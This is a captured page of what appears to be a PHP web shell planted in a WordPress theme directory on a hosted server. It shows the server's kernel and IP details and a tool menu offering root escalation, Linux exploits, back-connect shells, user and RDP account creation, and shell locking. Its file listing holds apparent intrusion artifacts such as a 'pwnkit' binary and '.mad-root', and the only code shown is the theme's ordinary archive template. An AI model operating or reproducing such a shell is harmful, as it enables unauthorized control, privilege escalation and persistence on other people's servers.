Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
formation /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1.63
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
3.35
KB
-rw-r--r--
comments.php
3.15
KB
-rw-r--r--
content-aside.php
1.51
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content-page.php
637
B
-rw-r--r--
content-single.php
2.28
KB
-rw-r--r--
content.php
2.58
KB
-rw-r--r--
custom-css.js
807
B
-rw-r--r--
footer.php
2.29
KB
-rw-r--r--
functions.php
18.99
KB
-rw-r--r--
functionsbak.php
18.5
KB
-rw-r--r--
header.php
4.17
KB
-rw-r--r--
image.php
5.36
KB
-rw-r--r--
index.php
1.91
KB
-rw-r--r--
license.txt
14.96
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
no-results.php
1.15
KB
-rw-r--r--
page.php
1.03
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
1.69
KB
-rw-r--r--
rtl.css
47.04
KB
-rw-r--r--
screenshot.png
777.66
KB
-rw-r--r--
search.php
1.11
KB
-rw-r--r--
searchform.php
637
B
-rw-r--r--
sidebar.php
1.08
KB
-rw-r--r--
single.php
1.04
KB
-rw-r--r--
style.css
47.04
KB
-rw-r--r--
wpml-config.xml
1.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : archive.php
<?php /** * The template for displaying Archive pages. * * Learn more: http://codex.wordpress.org/Template_Hierarchy * * @package formation * @since formation 1.0 */ get_header(); ?> <header class="page-header"> <h1 class="page-title"> <?php if ( is_category() ) { printf( __( 'Category Archives: %s', 'formation' ), '<span>' . single_cat_title( '', false ) . '</span>' ); } elseif ( is_tag() ) { printf( __( 'Tag Archives: %s', 'formation' ), '<span>' . single_tag_title( '', false ) . '</span>' ); } elseif ( is_author() ) { /* Queue the first post, that way we know * what author we're dealing with (if that is the case). */ the_post(); printf( __( 'Author Archives: %s', 'formation' ), '<span class="vcard"><a class="url fn n" href="' . get_author_posts_url( get_the_author_meta( "ID" ) ) . '" title="' . esc_attr( get_the_author() ) . '" rel="me">' . get_the_author() . '</a></span>' ); /* Since we called the_post() above, we need to * rewind the loop back to the beginning that way * we can run the loop properly, in full. */ rewind_posts(); } elseif ( is_day() ) { printf( __( 'Daily Archives: %s', 'formation' ), '<span>' . get_the_date() . '</span>' ); } elseif ( is_month() ) { printf( __( 'Monthly Archives: %s', 'formation' ), '<span>' . get_the_date( 'F Y' ) . '</span>' ); } elseif ( is_year() ) { printf( __( 'Yearly Archives: %s', 'formation' ), '<span>' . get_the_date( 'Y' ) . '</span>' ); } else { _e( 'Archives', 'formation' ); } ?><span class="breadcrumbs"><?php if (function_exists('formation_breadcrumbs')) formation_breadcrumbs(); ?></span></h1> <?php if ( is_category() ) { // show an optional category description $category_description = category_description(); if ( ! empty( $category_description ) ) echo apply_filters( 'category_archive_meta', '<div class="taxonomy-description">' . $category_description . '</div>' ); } elseif ( is_tag() ) { // show an optional tag description $tag_description = tag_description(); if ( ! empty( $tag_description ) ) echo apply_filters( 'tag_archive_meta', '<div class="taxonomy-description">' . $tag_description . '</div>' ); } ?> </header><!-- .page-header --> <div id="primary_wrap"> <section id="primary" class="content-area"> <div id="content" class="site-content" role="main"> <?php if ( have_posts() ) : ?> <?php /* Start the Loop */ ?> <?php while ( have_posts() ) : the_post(); ?> <?php /* Include the Post-Format-specific template for the content. * If you want to overload this in a child theme then include a file * called content-___.php (where ___ is the Post Format name) and that will be used instead. */ get_template_part( 'content', get_post_format() ); ?> <?php endwhile; ?> <?php formation_content_nav( 'nav-below' ); ?> <?php else : ?> <?php get_template_part( 'no-results', 'archive' ); ?> <?php endif; ?> </div><!-- #content .site-content --> </section><!-- #primary .content-area --> <?php get_sidebar(); ?> </div> <?php get_footer(); ?>
Close